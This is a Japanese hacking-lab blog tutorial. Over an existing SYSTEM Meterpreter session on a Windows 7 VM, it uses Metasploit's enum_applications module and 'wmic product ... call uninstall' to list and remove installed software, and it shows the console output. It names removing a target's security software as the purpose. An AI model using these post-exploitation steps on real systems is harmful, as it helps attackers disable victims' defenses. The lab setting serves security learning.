Meterpreter で Windows 7 をハッキングしアプリを削除する

Windows 7

今回はターゲット端末のアプリケーション削除を行います。

ハッキングをする際にはターゲット端末にインストールされているアプリケーションが邪魔になる場合があり(例えばセキュリティソフト)、それを削除したいケースが発生するかと思います。

インストール済みのアプリケーションの表示

ターゲット端末側でインストールされているアプリケーションを確認するには「post/ windows/gather/enum_applicatios」というモジュールを使用します。

このモジュールは、すでに確立されているSYSTEM権限のセッションを利用します。

そのため、先にSYSTEM権限のセッションを確立してください。以下記事に方法を記載しています。

msf5 exploit(windows/local/bypassuac) > use post/windows/gather/enum_applications 
msf5 post(windows/gather/enum_applications) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/enum_applications) > ruset SEn

[*] Enumerating applications installed on IE8WIN7

Installed Applications
======================

Name Version
 ---- -------
 Microsoft .NET Framework 4.8 4.8.03761
 Microsoft .NET Framework 4.8 4.8.03761
 Oracle VM VirtualBox Guest Additions 6.1.2 6.1.2.0
 Update for Microsoft .NET Framework 4.8 (KB4503575) 1

[+] Results stored in: /root/.msf4/loot/20200307082240_default_10.0.0.102_host.application_734476.txt
[*] Post module execution completed
msf5 post(windows/gather/enum_applications) >

赤字で示した箇所がインストールされているアプリケーションです。

実際にWindows 7側でアプリケーション情報を確認します。

一部表示されていないアプリケーションがありますが、内容はほとんど一致しています。

コマンドプロンプトによるアプリケーション表示

コマンドプロンプト上のコマンドでもインストールされているアプリケーションを表示できます。

meterpreter プロンプトに戻り、そこで shell と実行してコマンドプロンプトを表示させます。

その後以下コマンドを実行すればインストール済みのアプリケーションが表示されます。

wmic product get name, installLocation

C:\Windows\system32>wmic product get name, installLocation
wmic product get name, installLocation
InstallLocation Name 
 Microsoft .NET Framework 4.8

C:\Windows\system32>

「post/ windows/gather/enum_applicatios」と比較して表示されるアプリケーションが少ないですが、この方法でもアプリケーションの表示は可能です。

アプリケーションの削除

ここまでではインストールされているアプリケーションの確認を行いましたが、とうとうアプリケーションの削除を行います。

削除はコマンドプロンプト上で以下コマンドを実行することで可能です。

wmic product where name=”<アプリ名>” call uninstall

今回は削除用に「Python」を Windows 7 にインストールしました。

(他にもサクラエディタや7-zipをインストールしてみましたが表示されず。)

C:\Windows\system32>wmic product get name
wmic product get name
Name 
Microsoft .NET Framework 4.8 
Python 2.7.17

それでは削除してみます。

C:\Windows\system32>wmic product where name="Python 2.7.17" call uninstallwmic product where name="Python 2.7.17" call uninstallExecuting (\\IE8WIN7\ROOT\CIMV2:Win32_Product.IdentifyingNumber="{9255D53C-6C21-4664-AAF3-6EAC50F867D9}",Name="Python 2.7.17",Version="2.7.17150")->Uninstall()Method execution successful.Out Parameters:instance of __PARAMETERS{ ReturnValue = 0;};

削除に成功した旨のメッセージが出力されたため、削除されたことを確認します。

C:\Windows\system32>wmic product get name
wmic product get name
Name 
Microsoft .NET Framework 4.8

このように、「Python 2.7.17」の表示が消えています。

さらに Windows 7側のGUI画面でも削除されていることが確認できました。

(特にWindows 7 側では削除されたメッセージは出力されません)

インストールされているすべてのアプリケーションが対象ではないため少し使いづらい印象を受けました。(実際に試しに複数のアプリケーションをインストールしてみたが表示されないものが多かった)

コマンドプロンプト上での操作なので、削除自体を行うモジュールがないかも今後調べていきたいと思います。

くどり

この記事は「ハッキング・ラボのつくりかた 第4章 」をベースに作成しています。購入リンクは以下です。
※Amazonアソシエイトを使用しています。

コメント

タイトルとURLをコピーしました